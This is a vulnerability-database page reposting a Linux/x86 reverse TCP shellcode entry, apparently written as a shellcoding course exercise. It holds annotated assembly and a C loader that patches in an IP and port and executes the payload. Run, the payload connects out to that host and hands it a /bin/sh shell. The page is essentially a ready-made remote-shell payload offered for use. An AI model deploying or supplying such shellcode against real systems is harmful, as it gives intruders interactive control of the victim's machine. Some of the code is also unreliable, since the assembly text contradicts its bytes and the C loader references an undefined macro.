Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 reverse TCP Shellcode (84 bytes)

🗓️ 25 Aug 2020 00:00:00Reported by Xenofon VassilakopoulosType 
zdt
 zdt🔗 0day.today👁 31 Views

Linux/x86 Reverse TCP Shellcode for connecting to specific IP address and port with a reverse shell payloa

Code
# Title: Linux/x86 - Reverse TCP Shellcode ( 84 bytes )
# Author: Xenofon Vassilakopoulos 
# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 84 bytes
# SLAE-ID: SLAE - 1314 

--------------------- Reverse Shellcode ---------------------

global _start 
section .text 

_start:  

xor eax, eax   ;zero out eax register  
mul edx        ;zero out edx register 

;;sockfd = socket(AF_INET,SOCK_STREAM,0); 
push edx     ; push 0 on the stack which is related with the third argument of the socket system call
mov ebx, edx ; zero out ebx  
inc ebx      ; define the SYS_SOCKET value to be 0x1.  
push ebx     ; SOCK_STREAM constant at type argument  
push 0x2     ; AF_INET constant at domain argument 
mov ecx, esp ; ECX will point to args at the top of the stack 
mov al, 0x66 ; call SocketCall() 
int 0x80     ; call system call interrupt to execute the arguments 
mov edi, eax ; EAX will store the return value of the socket descriptor to edi register 

;; sa.sin_family = AF_INET; 
;; sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR); 
;; sa.sin_port = htons(REMOTE_PORT);
;; connect(sockfd, (struct sockaddr *)&sa, sizeof(sa));

pop ebx          ; assign ebx with value (2) 
push 0x04c8a8c0  ; push IP 192.168.200.4 on the stack
push word 0xd204 ; push port 1234 on the stack   
push bx          ; push AF_INET constant into the 16 bytes register avoiding nulls 
mov ecx, esp     ; perform stack alignment - ecx points to struct 
push 0x10        ; the size of the port  
push ecx         ; pointer to host_addr struct
push edi         ; save socket descriptor sockfd to struct 
mov ecx, esp     ; perform stack alignment - ecx points at struct
inc ebx          ; use the connect system call (3) 
mov al, 0x66     ; call the socketcall system call 
int 0x80         ; call interrupt

;;dup2(sockfd, 2); 
;;dup2(sockfd, 1); 
;;dup2(sockfd, 0); 
   
mov ebx, esi  ; move sockfd descriptor to ebx 
xor ecx, ecx  ; zero out the ecx register before using it  
lo:
  mov al, 0x3f  ; the functional number that indicates dup2 (63 in dec)
  int 0x80      ; call dup2 syscall
  inc ecx       ; increase the value of ecx by 1 so it will take all values 0(stdin), 1(stdout), 2(stderr)
  cmp cl, 0x2   ; compare ecx with 2 which indicates the stderr descriptor
  jle lo        ; loop until counter is less or equal to 2


;; execve("/bin/sh", 0, 0);
xor eax, eax     ; zero out the eax register 
push eax         ; push NULL into the stack  
push 0x68732f2f  ; push "hs//" in reverse order into stack 
push 0x6e69622f  ; push "nib/" in reverse order into stack 
mov ebx, esp     ; point ebx into stack
push eax         ; push NULL into the stack 
mov edx, esp     ; point to edx into stack  
push ebx         ; push ebx into stack 
mov ecx, esp     ; point to ecx into stack 
mov al, 0xb      ; 0xb indicates the execve syscall 
int 0x80         ; execute execve syscall


--------------------- Shellcode ---------------------

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

#define PORT 27
#define REMOTE_ADDRESS 21

int main(int argc, char *argv[])
{

unsigned char shellcode[] = \
"\x31\xc0\xf7\xe2\x52\x89"
"\xd3\x43\x53\x6a\x02\x89"
"\xe1\xb0\x66\xcd\x80\x89"
"\xc7\x5b\x68"
"\xc0\xa8\xc8\x04"  // IP
"\x66\x68"
"\x04\xd2"   // PORT
"\x66\x53\x89\xe1\x6a\x10"
"\x51\x57\x89\xe1\x43\xb0"
"\x66\xcd\x80\x89\xfb\x31"
"\xc9\xb0\x3f\xcd\x80\x41"
"\x66\x83\xf9\x02\x7e\xf5"
"\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x89\xe2"
"\x53\x89\xe1\xb0\x0b\xcd"
"\x80";

// provide binary form of the IP into the shellcode in order to be able to connect to that specific IP address
unsigned ipaddress = inet_addr(argv[1]);

// copy the IP in the right shellcode offset 21 bytes from the beginning of the shellcode
memcpy(&shellcode[IP], &ipaddress, 4);

// provide binary form of the port into the shellcode in order to be able to connect to that specific port
unsigned int port = htons(atoi(argv[2]));

// copy the new port in the right shellcode offset 27 bytes from the beginning of the shellcode
memcpy(&shellcode[PORT], &port, 2);

printf("Shellcode Length: %d\n", strlen(shellcode));

int (*ret)() = (int(*)())shellcode;

ret();

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Aug 2020 00:00Current
0.2Low risk
Vulners AI Score0.2
shellcode reverse shell ip address connect sockfdsyscall dup2 execve
31